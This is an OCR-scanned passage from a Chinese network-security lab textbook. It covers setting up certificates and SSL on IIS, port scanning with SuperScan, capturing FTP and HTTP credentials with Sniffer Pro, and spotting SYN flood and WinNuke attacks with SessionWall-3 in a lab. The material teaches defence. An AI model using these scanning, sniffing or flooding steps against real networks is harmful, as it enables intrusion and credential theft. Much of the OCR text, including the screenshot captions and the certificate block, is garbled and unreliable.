图 10-30 ”登录 客户 端 图 10-31 ”申请 证 书 


(3) 选择 “高 级 证 书 申请 ”， 点 击 “ 创 建 并 向 此 CA 提交 一 个 申请 ”， 在 证 书 模板 里 
选择 “用 户 ”， 其 余 的 保持 默认 信和 即 可 ， 单 击 “ 提 交 ” 弹 出 一 个 对 话 框 ， 单 击 “ 是 ”就 行 
了 。 单 击 “ 下 载 CA 证 书 ”， 开 始 下 载 证 书 。 如 图 10-32 所 示 。 


.280 


E DT 
文件 日 ”编辑 (E) 查看 收藏 ( 久 工具 (D 帮助 
咎 展 - 了" 同 四 合肥 扫 天 辐 收 天 河 捍 体 地 | 双 - 号 
























地 址 (D) | 乱 ] https://192.168.1.106jcertsrvjcertfnsh.asp 了 | 必 转 到 链接 


icrosoft 证 书 a EA 


您 申请 的 证 书 已 发 布 给 您。 
国 这 air 








厦 三 厂 厢 伟 mene 4 





10-32 ”下载 证 书 


(4) 下 载 完成 后 ， 即 可 通过 双击 证 书 文件 ， 安 装 证 书 ， 如 图 10-33 所 示 。 








中 所 二 园 罩 人生 | 思拓 固 收 & 天 二 提 人 地 | 局- 双 











好 址 (0) | 乱 ] https:/)192.168.1.106jcertsryjcertmpn,asp S| 尼 畦 到 链接 


于 icrosoft 证 书 服务 主页 









您 的 新 证 书 已 经 成 功 安装 。 
副 
ET 元 
图 10-33 ”安装 证 书 


任务 2.3 SSL 通道 建立 


1. 实 训 目的 
学 习 如 何 为 Web 站 点 配置 SSL 通道 。 
2. 实 训 环境 


项 目 实 号 双 A A 





一 台 预 装 Windows 2003 服务 器 版 的 计算 机 及 一 台 计算 机 (可 以 是 Windows XP 或 其 他 


系统 )， 通 过 网 络 相 连 。 也 可 用 虚拟 机 组 建 实验 环境 。 
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3. 实 训 内 容 和 步骤 


(1) 安装 好 HS， 并 将 其 打开 (这 里 以 “默认 Web 网 站 ”为 例 )， 右 击 “ 默 认 Web 网 
站 ”， 选 择 本 机 的 人 P 地 址 。 选 择 “ 目 录 安 全 性 ”选项 卡 ， 此 时 “查看 证 书 ” 按 钮 为 灰色 不 
可 用 ， 说 明 还 未 为 “默认 Web 网 站 ”配置 数字 证 书 。 单 击 “ 服 务 器 证 书 ” 按 钮 ， 如 图 10-34 
所 示 。 


ETEETT 3 
ve 站 点 | | 攻 溪 。 | IShrT 帮 寺 器 | 主 上 录 | 文档 
目录 安全 性 ImTP 头 | 。 自 定义 幸 误 信息 。 | 。 服务 器 扩展 














10-34 IIS 属性 设置 


(2) 由 于 之 前 并 未 配置 过 数字 证 书 ， 所 以 应 选择 “创建 一 个 新 证 书 ” 选 项 。 单 击 “ 下 
一 步 ” 按 钮 ， 如 图 10-35 所 示 。 


Is 证 书 向 导 x| 


服务 器 证 书 RS 
有 三 种 方法 格 证 书 分 配 到 Web 站 点 上 。 人 





选 职 修 相 用 于 此 Web 站 点 的 方法 : 

个 他 陡 一 个 新 证 书 亿 )。 

个 分 配 一 个 已 存在 的 证 书 

个 从 密 角 首 理 器 备份 文件 导入 一 个 证 书 介 )。 





sm[EE5 ww | 


图 10-35 创建 新 证 书 

(3) 名 称 可 以 根据 需要 更 改 ， 不 影响 证 书 的 使 用 。 默 认 位 长 一 般 已 经 足够 安全 。 虽 然 
数值 越 大 就 越 安全 ， 但 是 数值 越 大 ， 系 统 的 处 理 速度 就 会 越 慢 。 直 接 单 击 “ 下 一 步 ” 按 
钮 ， 组 织 、 部 门 填写 真实 并 能 够 被 证 实 的 信息 ， 因 为 CA 管理 员 会 根据 这 些 信 息 进 行 审 
核 。 单 击 “ 下 一 步 ”按钮 ， 如 图 10-36 所 示 。 

(4) “公用 名 称 ” 不 能 随便 更 改 ， 只 能 是 该 网 站 的 DNS。 如 果 尚 未 申请 DNS， 则 可 以 
用 了 下 地 址 代替 。 默 认 情 况 下 是 服务 器 的 计算 机 名 ， 但 这 种 情况 只 适合 于 企业 机 构 (AD 管理 ) 
此 处 要 配置 的 是 独立 机 构 ， 所 以 公用 名 只 能 是 DNS 或 PP 地 址 。 单 击 “ 下 一 步 ” 按 钮 ， 如 
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图 10-37 所 示 。 





Ts 证 书 疝 导 


租 织 信息 
修 的 证 书 必须 有 效 的 组 织 的 相关 信息 ， 以 便 格 其 与 其 它 组 织 区 分 。 











站 点 的 公用 名 称 
您 Web 站 点 的 公用 名 称 是 其 完全 合格 的 域名 称 。 





10-37 ”公用 名 称 
(5) 这 些 信息 也 将 是 CA 管理 员 的 审核 对 象 。 单 击 “ 下 一 步 ”按钮 ， 如 图 10-38 所 示 。 





图 10-38 ”地理 信息 
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(6) 至 此 ， 数 字 证 书 的 信息 已 经 填写 完毕 。 这 一 步 将 这 些 信息 以 Base64 编码 的 形式 保 
存在 本 地 ，Web 管理 员 可 以 用 CA 证 书 申请 系统 进行 证 书 的 申请 。 单 击 “ 下 一 步 ”按钮 ， 
如 图 10-39 所 示 。 


15 


证 书 请 求 文件 名 
证 书 请 求 用 您 指定 的 文件 名 被 保存 为 一 个 文本 文件 。 


为 证 书 请 求 输入 一 个 文件 名 。 








文件 名 四 : 
es ma SettingsWdnini strater\ 砚 面 \certrea txt OOD 








《上 - 步 四 [下 -- 步 中 计 取消 
图 10-39 证 书 请 求 文件 名 
(7) 完成 后 ， 打 开 保存 的 数字 证 书 申 请 信息 ， 如 图 10-40 所 示 。 


局 certreq - 记事 本 吕 
文件 (E) 编辑 (E) 格式 (0) 帮助 (H) 

-i BEGIN NEW CERTIFICATE REQUEST--—-— 

IMI IDUTCCAroCAQAwd jEXMBUGA1UEAxMOMTcyL jIwHi xMChxMTExEjAQI 






Cuhhbn11aGFuZzESMBAGA1UEChMJaGFueXUoYWSnMREwDwYDUQQHEwhk' 
dTETMBEGA1UECBMKYmUpamlu23NoaTELMAKGA1UEBhMCQ 94wg28wDQYJI 
AQEBBQADgY BAMIGJAOGBANr iNUSqXFb BC7RH/G7HiSKSqH91BZXK9JCLI 
luvk1aQQyN5 8JT/bLacoPanHeAofFX3NzuPefFCGbyFas3cH3+9D+r IJidI 
dSMua2icHIHZEJFL2/Wtc6jTkieWtjOF1GIdTXSx9Kal6nihjRaSPnkf: 
AgMBAAGggIGZMBoGCisGAQQBgjcNAgMxDBYKNS wl jIxOTUuMjB7Bgor' 
AgEOMW BwazAOBgNUHQSBAFSEBAMCBPAWRAY JKoZ IhucHAQkPBDCwHTAO! 
9weDAgICAIAWDgY IKoZ1hucHAwQCAgCAMACGBSSOAwIHMAOGCCqGS TDS 
1udJQQMMaoGCCsGRQUFBwMBMIH9BgorBgEERYI3DQICMYHuMIHrngEBL 
AGHAcgBuAHHAD WBnAHQAIABSAF MAQQAgAF MAQWBOAGEAbgBUuAGUADAAY! 
AHAAdABuAGCAcgBhAHAAaABpAGHALABQAHIAbwB2AGkAZABLAHIDIYKA. 
InoL SdN1ULkM2P6UFcMYME1cUMidPEUHEGFx0B1eTGXuBrhguJFDScUiy' 
lacnjcQFovPhb/iRhaCbbu1UsNFoJG1inCP 7Lr8k8g0W76zuvn+zfU5AI 












10-40 ”证书 申请 信息 


(8) 接 下 来 就 是 到 CA 的 证 书 申请 系统 申请 服务 器 验证 证 书 。 打 开 申请 证 书页 面 ， 选 
中 “高 级 申请 ” 单 选 按钮 ， 如 图 10-41 所 示 。 


ETIEE3ETEETTTTRTTTT 
这 种 人) 映 过 DD。 至 春 M 收 三 &) 工具 D 井 EWHD 
PEEE ERTL RR EE) 


TY FF 



















选择 申请 类 型 
请 移 挟 您 要 进行 的 申请 类 型 : 
用 户 证 书 申请 : 








人 富 要 甲 主 





TS > 





图 10-41 选择 申请 类 型 
(28. 
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(9) 选择 “使 用 base64 编码 的 PKCS#10 文件 提交 一 个 证 书 申请 ， 或 使 用 base64 编码 
的 PKCS#7 文件 更 新 证 书 申请 ”选项 ， 如 图 10-42 所 示 。 
































您 可 以 用 下 列 方法 之 一 为 你 | 他 用 户 ， 或 计算 宙 申 请 一 个 证 书 。 请 注意 证 书 领 
和 . 四 


使 用 表格 向 这 个 CA 可 广 一 个 证 书 申请 . 





ee 信人 的 各 名 下 申请 一 个 让 书 。 
省 育 一 个 太 解 雍 六 区 亡 以 放 罗 一 后 户 超 全 一 个 和 





图 
TT 


Men B || re ney i A 
图 10-42 ”高 级 证 书 申请 
(10) 用 于 申请 的 base64 编码 保存 在 一 个 名 为 certreq.txt 的 请 求 文件 (桌面 上 的 


certreq.txb 中 。 将 其 打开 ， 全 选编 码 ， 并 将 其 复制 /粘贴 到 申请 页 面 ， 如 图 10-43 所 示 。 单 
击 “ 提 交 ” 按 钮 。 











Microsoft 证 书 服务 - Microsoft Internet Explorer 








TR ENb  ) 
忠 址 (0) [外 hetp://172.202.10.111/certsrvicertraxt.asp 了 | 信和 到 链接 

















ase64 编码 的 PKCS Ras 证 书 
类 ed 由 “ 疾 新 申请 到 申请 字段 以 提交 一 个 申请 对 证 


A se 浏览 器 ) 生 成 


人 在 的 请 : -一 
TT | 
|AAOBgQCdJzZTITSn7Eurg52SQOl1DImEt WhbGrxuN 
Base6d |zLac1KIBIQpSvikgvDjs83MXLTU36BHk4jcxhO/YP 
请 |5cIafeHOCZrmhAEgg3OcI1I8oboo4u5cngUz73Kdql 
(PKCS #10 或 #7): |-----END NEW CERTIFICATE REQUEST-———— 四 











y 
浏览 要 插入 的 文件 。 
[es 加 





[| [人 memnet 


ET CE 
图 10-43 ”证 书 申请 摘要 


(11) 返回 证 书 颁发 机 构 ， 进 行 证 书 颁发 (选择 “开始 ”一 “管理 工具 ”一 “证 书 颁发 
机 构 ” 菜 单 命 令 )， 方 法 是 右 击 证 书 ， 在 快捷 菜单 中 选择 “所 有 任务 ”一 “颁发 ”命令 ， 如 
10-44 所 示 。 

(12) 选中 “检查 挂 起 的 证 书 ” 单 选 按钮 ， 将 证 书 下 载 ， 如 图 10-45 所 示 。 

(13) 返回 默认 网 站 的 属性 对 话 框 ， 在 “目录 安全 性 ”选项 卡 中 单 击 “ 服 务 器 证 书 ” 按 
钮 进行 数字 证 书 的 安装 ， 选 择 好 刚才 保存 的 .cer 证 书 文 件 ， 如 图 10-46 所 示 。 

(14) 接 下 来 可 以 建立 SSL 通道 请 求 ， 选 择 “ 申 请 安全 通道 ”和 “申请 客户 证 书 ”( 也 
可 选择 其 他 选项 ， 视 具体 情况 而 定 )。 单 击 “ 确 定 ”按钮 ，Web 服务 器 配置 完毕 ， 如 


.85\. 


i i pa 


图 10-47 所 示 。 








您 使 用 此 人 本 ， a 申请 一 个 
》 一旦 ee ， ， 
ee 
选择 一 个 任务 : 
人 检索 CA 证 书 或 证 书 吊销 列表 
C 申请 证 书 
次 查 竺 起 的 证 汀 








图 10-45 检查 挂 起 的 证 书 


II5 证 书 向 导 
处 理 挂 起 的 请 求 
通过 修复 包含 证 书 颁 发 机 构 的 答复 文件 来 处 理 一 个 挂 起 的 证 书 请 求 。 








Documents and Settines\Administrator\ 虚 面 \certnew. cer 





7 7 | 
图 10-46 选择 证 书 


./2ed\. 
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10-47 ”选择 安全 通信 


(15) 在 客户 端 浏览 器 中 输入 Web 地 址 ， 打 开 网 页 。 由 于 Web 已 经 配置 成 要 求 SSL 通 
道 ， 所 以 客户 访问 的 时 候 不 能 再 用 http 协议 ， 而 应 该 用 https 协议 ， 如 图 10-48 所 示 。 


Oa | 
http://172. 202. 10.111/ 


该 网 页 必须 通过 安全 频道 查看 


您 要 查看 的 网 页 要 求 在 地 址 中 使 用 “https”。 


请 尝试 下 列 操作 : 
。 在 您 要 访问 的 地 址 前 面 键 入 “https:”， 然 后 重 试 。 


HTTP 403.4 - 禁止 访问 : 要 求 SSL 
Internet 信息 服务 








10-48 ”提示 使 用 安全 通信 
(16) 在 客户 端 浏览 器 中 输入 Web 地 址 ， 打 开 网 页 。 由 于 Web 已 经 配置 成 要 求 SSL 通 
道 ， 所 以 修改 成 https 协议 后 再 次 打开 网 页 ， 弹 出 “选择 数字 证 书 ” 对 话 框 (默认 客户 端 已 
经 安装 CA 证 书 ， 如 果 客 户 端 尚未 安装 CA 证 书 ， 则 在 弹出 此 窗口 之 前 会 弹出 一 个 警告 窗 
口 ， 单 击 “ 确 定 ” 按 钮 后 就 会 弹出 该 对 话 框 )， 如 图 10-49 所 示 。 
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2 SE] 


纺 杜 0 | 乱 https://172 202 二 1 "1 
EF 了 


该 网 页 必须 通过 安全 | 标识 











请 次 试 下 列 唤 作 : 
。 在 您 要 访问 的 地 址 计 


ee a 下 


Taternet 更 多 信息 加- | 查看 证 书 I， 
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实 训 3 端口 扫描 与 网 络 监听 
任务 3.1 使 用 SuperScan 进行 端口 扫描 


1. 实 训 目的 


通过 练习 使 用 网 络 端口 扫描 器 ， 可 以 了 解 主机 开放 的 端口 和 服务 程序 ， 从 而 获取 系统 
的 有 用 信息 ， 发 现 网 络 系统 的 安全 漏洞 。 端 口 扫描 既是 系统 管理 员 的 常用 安全 检查 手段 ， 
也 是 黑客 攻击 的 前 奏 。 本 实 训 将 在 Windows 环境 下 使 用 SuperScan 进行 网 络 端 口 扫描 实 
训 ， 增 强 学 生 安 全 防护 知识 。 


2. 实 训 环境 

两 台 预 装 Windows 7/XP 的 计算 机 ， 通 过 网 络 相 连 。 也 可 用 虚拟 机 组 建 实 训 环 境 。 
3. 实 训 内 容 和 步骤 

SuperScan 具有 端口 扫描 、 主 机 名 解析 、Ping 扫描 功能 ， 其 界面 如 图 10-50 所 示 。 














图 10-50 SuperScan 操作 界面 
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1) 使 用 SuperScan 进行 主机 名 解析 


在 Hostname Lookup 栏 中 ， 可 以 输入 人 PP 地 址 或 需要 转换 的 域名 ， 单 击 Lookup 按钮 ， 
就 可 获得 转换 后 的 结果 ; 单 击 Me 按钮 ， 可 获得 本 机 的 人 P 地 址 ; 单 击 Interfaces 按钮 ， 可 
获得 本 地 计算 机 卫 地 址 的 详细 设置 。 

2) 使 用 SuperScan 进行 端口 扫描 

利用 端口 扫描 功能 ， 可 以 扫描 目标 主机 开放 的 端口 和 服务 。 在 IP 栏 中 ， 在 Start 文本 
框 中 输入 开始 的 他 地 址 ， 在 Stop 文本 框 中 输入 结束 的 了 P 地 址 ， 在 Scan type 栏 中 选中 All 
list ports from 1 to 65535， 这 里 规定 了 扫描 的 端口 范围 ， 然 后 单 击 Scan 栏 中 的 Start 按钮， 
就 可 以 在 选择 的 I 人 P 地 址 段 内 扫描 不 同 主机 开放 的 端口 了 。 扫 描 完 成 后 ， 选 中 扫描 到 的 主机 
IP 地 址 ， 单 击 Expand all 按钮 ， 会 展开 每 台 主 机 详细 扫描 结果 。 图 10-51 是 对 主机 
192.168.0.1 的 扫描 结果 。 扫 描 窗口 右 侧 的 Active hosts 和 Open ports 将 分 别 显示 发 现 的 活动 
主机 和 开放 的 端口 数量 。 

SuperScan 也 提供 特定 端口 扫描 功能 。 在 Scan Type 栏 中 选中 All select ports in list 选 
项 ， 就 可 以 按照 选 定 的 端口 扫描 。 单 击 Configuration 栏 中 的 Port list setup 按钮 ， 就 可 进入 
端口 配置 菜单 ， 如 图 10-52 所 示 。 选 中 Select ports 栏 中 的 某 一 个 端口 ， 在 左上 角 的 
Change/add/delete port info 栏 中 会 出 现 这 个 端口 的 信息 。 选 中 Selected 复 选 框 ， 然 后 单 击 
Apply 按钮 ， 就 可 将 此 端口 添加 到 扫描 的 端口 列表 中 。Add 和 Delete 键 可 以 添加 或 删除 相 
应 的 端口 。 然 后 单 击 Port list file 栏 中 的 Save 按键 ， 会 将 选 定 的 端口 列表 存 为 一 个 .lst 文 
件 。 默 认 情况 下 ，SuperScan 有 scanner.lst 文件 ， 包 含 了 常用 的 端口 列表 ; 还 有 一 个 
trojans.lst 文件 ， 包 含 了 常见 的 木马 端口 列表 。 通 过 端口 配置 功能 ，SuperScan 提供 了 对 特 
定 端口 的 扫描 ， 节 省 了 时 间 和 资源 ， 通 过 对 木马 端口 的 扫描 ， 可 以 检测 目标 主机 是 否 被 种 
植木 马 。 


;SuperSoan 3.00 
Bdit Port Liet 
Chamgo/odd/dolole pointo 一 
pot Seed || euw 


Deopin [ms | ud | Nese | sam | ox | 
Poem | 2» 





Pp 
Salaisam | Pn 


er 
Saial 3 


Pevc| Newc| 1 zi| 





a i 
[meer rene ere samaj cos | 








Bes C Nietpathon [FE 
F Mpation FE 



































10-51 ”端口 扫描 结果 10-52 ”端口 配置 界面 


3) Ping 功能 

SuperScan 的 Ping 功能 提供 了 检测 在 线 主机 和 判断 网 络 状况 的 作用 。 通 过 在 人 P 栏 中 输 
入 起 始 和 结束 卫 地 址 ， 选 中 Scan type 栏 中 的 Ping only 选项 ， 即 可 单 击 Start 启动 ping 扫 
描 。 在 卫 栏 ，Ignore IP zero 和 Ignore IP 255 分 别 用 于 屏蔽 所 有 以 0 和 255 结束 的 全 地 
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址 ，PrevC 和 NextC 按钮 可 直接 转换 到 前 一 个 或 后 一 个 C 类 了 正 网 段 。“1...234” 按 钮 则 用 
于 直接 选择 整个 网 段 。 在 Timeout 栏 中 可 根据 需要 选择 不 同 的 时 间 。 


任务 3.2 使 用 Sniffer 工具 进行 网 络 监听 


1. 实 训 目的 


通过 使 用 Sniffer Pro 软件 掌握 Sniffer( 嗅 探 器 ) 工 具 的 使 用 方法 ， 实 现 捕 提 EFTP、HTITP 
等 协议 的 数据 包 ， 以 理解 TCP/IP 协议 中 多 种 协议 的 数据 结构 、 会 话 连接 建立 和 终止 的 过 
程 、TCP 序列 号 、 应 答 序列 号 的 变化 规律 ， 并 且 通 过 实 训 了 解 FTP、HTTP 等 协议 明文 传 
输 的 特性 ， 以 建立 安全 意识 ， 防 止 FTP、HTTP 等 协议 由 于 传输 明文 密码 造成 的 泄密 。 


2. 实 训 环境 


台 安 装 有 Windows 7/XP 的 PC， 其 中 一 台 安 装 Sniffer Pro 软件 ，PC 间 通 过 HUB 相 
连 ， 组 成 局 域 网 。 也 可 用 虚拟 机 组 建 实 训 环境 。 


3. 实 训 内 容 和 步骤 


1) Sniffer Pro 工具 的 使 用 

(1) 启动 Sniffer Pro 软件 。 

可 看 到 它 的 主 界面 ， 启 动 时 有 时 需要 选择 相应 的 网 卡 ， 选 好 后 即 可 启动 软件 。 

(2) 捕获 数据 包 前 的 准备 工作 。 

在 默认 情况 下 ，Sniffer 将 捕获 其 接 入 碰撞 域 中 流 经 的 所 有 数据 包 。 但 在 某 些 场景 下 ， 
有 些 数据 包 可 能 不 是 我 们 所 需要 的 。 为 了 快速 定位 网 络 问题 所 在 ， 有 必要 对 所 要 捕获 的 数 
据 包 进行 过 滤 。Sniffer 提供 了 捕获 数据 包 前 的 过 滤 规 则 的 定义 ， 过 滤 规 则 包括 2、3 层 地 
址 的 定义 和 几 百 种 协议 的 定义 。 定 义 过 滤 规 则 的 做 法 一 般 如 下 。 

@ 在 主 界面 选择 Capture 一 Define Filter 菜单 命令 。 

@ 在 Address 选项 卡 中 ， 包 括 MAC 地 址 、IP 地 址 和 IPX 地 址 的 定义 。 以 定义 下 地 
址 过 滤 为 例 ， 对 话 框 如 图 10-53 所 示 。 





Summary Address | Dats Pattern | Advanced| Buffer | Settings For 


























图 10-53 ”过 滤器 地 址 过 滤 界 面 
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比如 ， 现 在 要 捕获 地 址 为 10.1.30.100 的 主机 与 其 他 主机 通信 的 信息 ， 在 Mode 栏 中 选 
中 Include( 而 Exclude 选项 表示 捕获 除 此 地 址 外 所 有 的 数据 包 ); 在 Station 栏 中 ， 在 左 侧 列 
中 输入 10.1.30.100， 在 右 侧 列 中 输入 any( 表 示 所 有 的 卫 地 址 )。 这 样 就 完成 了 地 址 的 定 
义 。 此 时 Dir. 栏 的 图 标 开 表示 ， 捕 获 Stationl 收发 的 数据 包 最 后 ， 单 击 本 按钮 将 
定义 的 规则 保存 下 来 ， 供 以 后 使 用 。 

@ 在 Advanced 选项 卡 中 定义 希望 捕获 的 相关 协议 的 数据 包 ， 如 图 10-54 所 示 。 若 想 
捕获 FTP、NETBIOS、DNS、HTTP 等 数据 包 ， 要 首先 打开 TCP 分 支 ， 再 进一步 选择 协 
议 ; DNS、NETBIOS 的 数据 包 有 些 是 属于 UDP 协议 ， 故 需 在 UDP 分 支 做 类 似 TCP 选项 
卡 的 工作 ， 否 则 捕获 的 数据 包 将 不 全 。 如 果 不 选任 何 协议 ， 则 捕获 所 有 协议 的 数据 包 。 
Packet Size 栏 可 以 定义 捕获 的 包 大 小 ， 如 图 10-55 所 示 ， 则 定义 捕获 包 大 小 界 于 64 一 128 
字 节 的 数据 包 。 
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图 10-54 ”过 滤器 协议 过 滤 界 面 图 10-55 包 大 小 设置 界面 


@ 在 buffer 选项 卡 用 于 定义 捕获 数据 包 的 缓冲 区 ， 如 图 10-56 所 示 。 在 Buffer size 
栏 ， 将 其 设 为 最 大 40MB。 在 Capture buffer 栏 ， 设 置 缓冲 区 文件 存放 的 位 置 。 
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图 10-56 ”捕获 数据 包 缓冲 区 大 小 设置 界面 
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@ 最 后 ， 需 将 定义 的 过 滤 规 则 应 用 于 捕获 中 。 如 图 10-57 所 示 ， 在 Select a filter for 
capture 列表 框 中 选取 定义 的 捕获 规则 。 
(3) 捕获 数据 包 时 观察 到 的 信息 。 
选择 Capture 一 Start 菜单 命令 ， 启 动 捕获 引擎 。Sniffer 可 以 实时 监控 主机 、 协 议 、 应 
用 程序 、 不 同 包 类 型 等 的 分 布 情况 ， 如 图 10-58 所 示 。 
EEC lx 


General | 
Select a filter for capture; 
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Advanced 
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图 10-58 Sniffer 的 监控 选项 界面 


其 中 Dashboard 可 以 实时 统计 每 秒 钟 接 收 到 的 包 的 数量 、 出 错 包 的 数量 、 丢 弃 包 的 数 
量 、 广 播 包 的 数量 、 多 播 包 的 数量 以 及 带宽 的 利用 率 等 。Host Table 可 以 查看 通信 量 最 大 
的 前 10 位 主机 。Matrix 通过 连 线 ， 可 以 形象 地 看 到 不 同 主机 之 间 的 通信 。Application 
Response Time 可 以 了 解 到 不 同 主机 通信 的 最 小 、 最 大 、 平 均 响应 时 间 方 面 的 信息 。 
History Samples 可 以 看 到 历史 数据 抽样 出 来 的 统计 值 。Protocol Distribution 可 以 实时 观察 
到 数据 流 中 不 同 协议 的 分 布 情况 。Switch 可 以 获取 Cisco 交换 机 的 状态 信息 。 在 捕获 过 程 
中 ， 同 样 可 以 对 想 观察 的 信息 定义 过 滤 规 则 ， 操 作 方 式 类 似 捕获 前 的 过 滤 规 则 。 

(4) 捕获 数据 包 后 的 分 析 工 作 。 

要 停止 Sniffer 捕获 包 ， 选 择 Capture 一 Stop 或 者 Capture 一 Stop and Display 菜单 命令 ， 
前 者 停止 捕获 包 ， 后 者 停止 捕获 包 并 把 捕获 的 数据 包 进 行 解码 和 显示 ， 如 图 10-59 所 示 。 
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@ ”Decode: 对 每 个 数据 包 进 行 解码 ， 可 以 看 到 整个 包 的 结构 及 从 链 路 层 到 应 用 层 的 
信息 ， 事 实 上 ，Sniffer 的 大 部 分 时 间 都 花费 在 这 上 面 的 分 析 ， 同 时 也 对 使 用 者 在 
网 络 理论 及 实践 经 验 提出 较 高 的 要 求 。 素 质 较 高 的 使 用 者 借 此 工具 便 可 看 穿 网 络 
问题 的 症结 所 在 。 
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10-59 ”停止 捕获 数据 包 


@ Expert: 这 是 Sniffer 提供 的 专家 模式 ， 系 统 自身 根据 捕获 的 数据 包 从 链 路 层 到 应 
用 层 进行 分 类 并 作出 诊断 。 其 中 diagnoses 提出 非常 有 价值 的 诊断 信息 。 图 10-60， 
是 sniffer 侦查 到 IP 地 址 重叠 的 例子 及 相关 的 解析 。 


Snifl: Expert, 416 Ethernet Frames 


Sh-XPSP2 ( [ig2 168.1.104] Duplicate Network Address 
一 28E347AD4ECC IP Mdress SW-XFSF2 ( [192.168.1.1 
地 000c29347BB1 
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图 10-60 专家 分 析 界 面 


®@ Sniffer 同样 提供 解码 后 的 数据 包 过 滤 显 示 。 要 对 包 进 行 显示 过 滤 ， 需 切换 到 
Decode 模式 。Display 一 Define Filter 菜单 命令 可 定义 过 滤 规 则 ，Display 一 Select 
Filter 菜单 命令 可 应 用 过 滤 规 则 。 显 示 过 滤 的 使 用 基本 上 跟 捕 获 过 滤 的 使 用 相同 。 
(5) Sniffer 提供 的 工具 应 用 。 
Sniffer 除了 提供 数据 包 的 捕获 、 解 码 及 诊断 外 ， 还 提供 了 一 系列 的 工具 ， 包 括 包 发 生 
器 、Ping、Traceroute、DNSlookup、Finger、Whois 等 工具 。 其 中 ， 包 发 生 器 比较 有 特色 ， 
将 做 简单 介绍 。 其 他 工具 在 操作 系统 中 也 有 提供 ， 不 做 介绍 。 
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包 发 生 器 提供 3 种 生成 数据 包 的 方式 。 
@ 选择 宪 ， 新 构 一 个 数据 包 ， 包 头 、 包 内 容 及 包 长 由 用 户 直 接 填 写 。 图 10-61 所 
示 ， 即 定义 一 个 广播 包 ， 使 其 连续 发 送 ， 包 的 发 送 延迟 为 lms。 
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图 10-61 Sniffer 的 数据 包 发 送 
@ 单 击 坚 按钮 ， 发 送 在 Decode 中 所 定位 的 数据 包 ， 同 时 可 以 在 此 包 的 基础 上 对 数据 





包 进 行 如 前 述 的 修改 。 
@@ 单 击 加 按钮 ， 发 送 buffer 中 所 有 的 数据 包 ， 实 现 数据 流 的 重 放 ， 如 图 10-62 所 示 。 
Send current buffer ?| x 
Configuration | 
offer: ip 广播 包 . cap 
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10-62 ”设置 数据 包 重 放 次 数 


可 以 定义 连续 地 发 送 buffer 中 地 数据 包 或 只 发 送 一 次 buffer 中 地 数据 包 。 请 特别 注 
意 ， 不 要 在 运行 的 网 络 中 重 放 数 据 包 ， 和 否则 容易 引起 严重 的 网 络 问题 。 数 据 包 的 重 放 经 常 
用 于 实 训 环境 中 。 

2) ”捕获 FTP 数据 包 并 进行 分 析 

(1) 如 前 设置 好 捕获 条 件 ， 选 择 Capture 一 Define Filter 菜单 命令 ， 在 Advanced 选项 卡 
中 ， 选 中 了 一 了 TCP 一 FTP 选项 。 

(2) 单 击 捕捉 键 。 注 意 打开 工具 栏 中 Capture Panel 按钮 ， 可 显示 出 捕捉 的 Packet 
数量 。 

(3) 在 B 主机 上 开始 登录 一 个 FTP 服务器， 接着 打开 FTP 的 某 个 目录 ， 此 时 ， 从 
Capture Panel 中 看 到 捕获 的 包 已 达到 一 定数 量 ， 可 停止 抓 包 。 
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(4) 单 击 窗口 左下 角 的 Decode 按钮 ， 会 显示 捕捉 的 数据 包 并 进行 分 析 。 

(5) 在 捕获 包 中 ， 可 以 发 现 大量 有 用 的 信息 ， 如 用 户 名 、 登 录 密码 、 包 类 型 、 结 构 等 。 

3) ”捕获 HTTP 数据 包 并 分 析 

(1) 如 前 设置 好 捕获 条 件 ， 选 择 Capture 一 Define Filter 菜单 命令 ， 在 Advanced 选项 卡 
中 ， 选 中 了 P-~TCP-~HTTP 选项 。 

(2) 步骤 同 前 。 

(3) B 主机 登录 一 个 Web 服务 器 ， 并 输入 自己 邮箱 的 地 址 和 密码 。 

(4) 步骤 同 前 。 

(5) 同样 ， 可 在 捕获 包 中 得 到 大 量 重要 信息 。 





实 训 4 ”CA SessionWall 的 安装 与 配置 
任务 4.1 CA SessionWall 的 实时 检测 


1. 实 训 目的 

CA 公司 的 入 侵 检 测 软件 Session Wall-3 提供 了 友好 的 界面 ， 可 用 来 控制 并 查看 各 种 网 
络 数据 ， 同 时 可 以 对 数据 进行 统计 ， 并 以 统计 结果 的 方式 显示 出 来 。 本 实 训 的 目的 是 了 解 
Session Wall 的 强大 功能 以 及 IDS 在 网 络 中 的 地 位 与 作用 ， 学 会 使 用 SessionWall-3 进行 实 
时 安全 检测 。 

2. 实 训 环境 

两 台 预 装 Windows 2003 服务 器 版 或 标准 版 的 计算 机 ， 通 过 网 络 相连 。 也 可 用 虚拟 机 
组 建 实验 环境 。 

3. 实 训 内容 和 步骤 

【准备 工作 】 

安装 Session Wall-3。 注 意 ， 如 果 在 安装 时 选择 了 SessionWall-3 作为 服务 启动 ， 则 系 
统 每 次 启动 时 都 要 启动 SessionWall-3。 

【 实 训 内 容 和 步骤 】 

(1) 启动 SessionWall-3， 可 以 看 到 如 图 10-63 所 示 的 界面 。 

(2) 打开 PingPro， 选 取 Scan 标签 ， 配置 Pin9 Pro 检测 合作 伙伴 的 系统 。 也 可 采用 其 
他 的 攻击 方法 (如 SYN Flood 攻击 和 WinNuke 拒绝 服务 攻击 ) 向 合作 伙伴 发 起 攻击 。 


(3) 由 于 合作 双方 进行 同样 的 练习 ， 可 以 从 SessionWall 中 看 到 指示 灯 闪 烁 和 流量 增加 
的 信息 。 如 图 10-64 所 示 为 指示 灯 的 闪烁 。 
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图 10-64 ”SessionWall-3 的 指示 灯 闪 烁 


(4) 在 SessionWall 的 工具 栏 中 ， 单 击 安全 检测 按钮 ， 打 开 Detected security violations 
窗口 ， 查 看 提示 信息 ， 如 图 10-65 所 示 。 

















Smurf (Pong) at,,, Mon, Apr 07,20:30 Mon, Apr 07,20:30 。 Pong attack again 





图 10-65 Detected security violations 窗口 
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(5) 关闭 Detected security violations 窗口 ， 然 后 关闭 SessionWall。 
SessionWall 可 以 用 来 充当 实时 监测 系统 ， 直 接 的 图 表 报 警方 式 较为 直观 ， 而 且 它 的 检 
测 结果 非常 友好 、 易 于 分 析 ， 有 助 于 网 络 安全 审计 人 员 迅 速 做 出 反应 。 


任务 4.2 在 SessionWall-3 中 创建 、 设 置 审计 规则 


1. 实 训 目的 
学 习 在 SessionWall-3 中 创建 和 设置 审计 规则 的 方法 。 
2. 实 训 环境 


两 台 预 装 Windows 2003 服务 器 版 或 标准 版 的 计算 机 ， 通 过 网 络 相连 。 也 可 用 虚拟 机 
组 建 实验 环境 。 


3. 实 训 内 容 和 步骤 


(1) 打开 SessionWall-3， 选 择 Functions 一 Intrusion Attempt Detection Rules， 打 开 的 对 
